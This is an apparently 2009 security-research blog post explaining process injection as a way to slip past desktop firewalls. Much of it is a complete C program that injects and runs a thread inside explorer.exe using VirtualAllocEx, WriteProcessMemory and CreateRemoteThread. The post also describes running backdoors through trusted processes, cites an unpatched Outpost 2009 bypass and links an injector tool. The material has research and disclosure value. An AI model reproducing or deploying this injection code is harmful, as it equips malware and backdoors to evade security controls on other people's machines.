Security Researchs

Hello Friends .

First question is why Process  Injection ?

in this method we can attach evil Process to permitted Process . as you know , firewalls Permit to some Process , like : Internet explorer [IE] or Firefox or windows update or …  .  this Processes can connect to Internet very well [ often  ] .

Process injection , Dll injection , “PE injection “ are methods to bypass firewalls [This Methods called as  : Leak Firewall ] .

in dll injection , we injects dll  into an application process area, and references to his own malicious DLL to make firewall believes that it’s the application which is using the DLL .

Today when we talk about injection, we are talking about a DLL that is loaded into a running process’s memory.  as we know Windows is now designed for this, and injection techniques can be used by any application.  Some applications use it to add features to a closed-source program [for example : Babylon Dictionary is One of them ] .

I,m not intend to talk about these [dll ,process Injection ] at this time . and i just want  talk about Process injection [ or hijack] to bypass firewalls .

Attention To modeling :

Principle of application run [default ] :

when inclusion of a dynamic library [dll]   :

inserting malicious code in the process of confidence :

Used internet Explorer [trusted Software ] for injection :

The following illustration shows the general Code injection  with windows API method [virtualAllocEX(),..]

how to Inject Process : [with C cod ]

for firewall bypass we have 4 part :

- Open one process “P”
- Allocate memory remotely in “P” space
- Copy the code to remote process
- Create a thread to execute the code remotely
[will happen]

Example Of Process Injection In EXPLORER.EXE [code ]:

#pragma comment(lib,”Shlwapi.lib”)
#pragma comment(lib,”ADVAPI32.LIB”)
#include <stdio.h>
#include <windows.h>
#include <Shlwapi.h>
#include <tlhelp32.h>
#define INJECT_EXE  “explorer.exe”

typedef struct _RPar
{
DWORD dwDeleteFile;
DWORD dwSleep;
DWORD dwMessageBox;
char Filename[1024];
char string1[1024];
char string2[1024];
} RPar;
DWORD __stdcall ThreadProc(RPar *Para)
{
FARPROC PDeleteFile = (FARPROC)Para->dwDeleteFile;
FARPROC PSleep = (FARPROC)Para->dwSleep;
FARPROC PMessageBox = (FARPROC)Para->dwMessageBox;

PMessageBox(NULL,Para->string1,Para->string2,MB_OK);

while(PDeleteFile(Para->Filename) == 0) {PSleep(1000);}
return 0;
}
int _stdcall WinMain(HINSTANCE hInst, HINSTANCE hPrevInst, LPSTR lpCmd, int nCmdShow)
{
DWORD dwThreadId,pID=0,dwThreadSize=2048;
void *pRemoteThread;
char ExeFile[1024];
HANDLE hProcess,hSnap;
HINSTANCE hKernel, hUser;
RPar my_RPar,*pmy_RPar;
PROCESSENTRY32 pe32 = {0};
if( (hSnap =CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)) == INVALID_HANDLE_VALUE )
return 3;
pe32.dwSize = sizeof(PROCESSENTRY32);
Process32First(hSnap, &pe32);
do {
if ( StrCmpNI(INJECT_EXE,pe32.szExeFile,strlen(INJECT_EXE)) == 0)
{
pID=pe32.th32ProcessID;
break;
}
} while (Process32Next(hSnap,&pe32));

if ( hSnap != INVALID_HANDLE_VALUE )
CloseHandle(hSnap);
hProcess = OpenProcess(PROCESS_ALL_ACCESS,FALSE,pID);
pRemoteThread = VirtualAllocEx(hProcess, 0, dwThreadSize, MEM_COMMIT | MEM_RESERVE,PAGE_EXECUTE_READWRITE);

WriteProcessMemory(hProcess, pRemoteThread, &ThreadProc, dwThreadSize,0);
ZeroMemory(&my_RPar,sizeof(RPar));
hKernel = LoadLibrary( “kernel32.dll”);
my_RPar.dwDeleteFile = (DWORD)GetProcAddress(hKernel, “DeleteFileA”);
my_RPar.dwSleep = (DWORD)GetProcAddress(hKernel, “Sleep”);
hUser = LoadLibrary( “user32.dll”);
my_RPar.dwMessageBox = (DWORD)GetProcAddress(hUser, “MessageBoxA”);
GetModuleFileName(NULL,ExeFile,1024);
printf (ExeFile);
strcpy(my_RPar.Filename, ExeFile);
strcpy(my_RPar.string1, “HI Abysssec”);
strcpy(my_RPar.string2, “OK”);
pmy_RPar =(RPar *)VirtualAllocEx (hProcess ,0,sizeof(RPar),MEM_COMMIT,PAGE_READWRITE);
WriteProcessMemory(hProcess ,pmy_RPar,&my_RPar,sizeof my_RPar,0);
CreateRemoteThread(hProcess ,0,0,(DWORD (__stdcall *)(void *))pRemoteThread ,pmy_RPar,0,&dwThreadId);
FreeLibrary(hKernel);
CloseHandle(hProcess);
system(”tasklist”);
return 0;
}

what Happens When Firewall bypass ?

in servers :

we can call “Internet explorer” or  other trusted Application with [ASP.NET Execute Permission ] and run backdoor in any port .

with this method , we can telnet to open port of server without any worry  .

In Client :

Backdoor , Trojans , bad software , connect to internet without Access .

Real Word [ Discovered By Abysssec ] test :

Vulnerability Firewall [Outpost 2009 ] :

http://www.agnitum.com/products/outpost/

You can Inject Process In IE7 or Mozilla Firefox [default Trusted ] .

[Sorry For more information , This bug is not fixed  , You can test it with Process Injector tools  ].

www.tarasco.org

[pinjector.exe] :

Download Link + source :

http://www.tarasco.org/security/pinjector/index.html

Final deduction:

1- We can Bypass some firewalls : Don’t checked  Allocated Memory in Trusted Process .

2- Dll , Process , PE injection is useful way to run Process without new Prosess ID [PID]  .

In Future :

1- Usage Of these Method In other bypass Protections [hybrid or frees  Protection ]

2 - PE INJECTION , why , what , where !?

More Information :

http://www.tarasco.org/security/pinjector/Win32.Design.Flaws.pdf

http://www.firewallleaktester.com/docs/leaktest.pdf

http://www.bluenotch.com/files/Shewmaker-DLL-Injection.pdf

————————————————————————————–

Happy new year  and holy days

god speed you

Daphne

This entry was posted on Saturday, January 3rd, 2009 at 12:22 am and is filed under Exploits / BUG Decryption, Fuzzing, Pen-test Method, advisory. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.